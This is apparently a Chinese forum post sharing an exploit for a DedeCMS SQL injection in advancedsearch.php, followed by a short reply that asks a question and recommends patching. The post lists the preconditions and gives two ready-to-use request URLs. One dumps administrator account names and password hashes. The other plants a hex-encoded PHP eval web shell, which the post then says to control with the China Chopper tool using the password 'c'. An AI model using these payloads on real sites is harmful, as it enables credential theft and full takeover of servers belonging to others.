dedecms最新注入和getshell漏洞利用

秋水5326

条件利用：

1.漏洞代码在/plus/advancedsearch.php 文件中
2.php.ini要开启session.auto_start = 1
3.必须知道一个存在的mid，需要后台有添加自定义搜索模型

爆账号密码poc：

http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin` aaa &sqlhash=123

getshell poc:

http://localhost/dedecms/plus/advancedsearch.php?mid=6&_SESSION[123]=update `%23@__mytag` set normbody=0x3C3F706870206576616C28245F504F53545B635D293B3F3E where aid=1 limit 1&sqlhash=123

然后菜刀链接http://localhost/dedecms/plus/mytag_js.php?aid=1 密码:c

回复小弟3

感谢分享这个漏洞的利用细节。从POC来看，确实利用了`_SESSION`参数注入和自定义搜索模型的mid，条件限制比较多（需要开启session.auto_start且知道存在mid）。不过这两个POC都涉及到直接操作数据库或写入标签，危险等级很高。建议dedecms用户尽快检查相关文件并升级补丁，同时检查`/plus/advancedsearch.php`是否被滥用。另外，能否补充一下那个`sqlhash`参数的作用？比如它是怎么和SESSION关联的？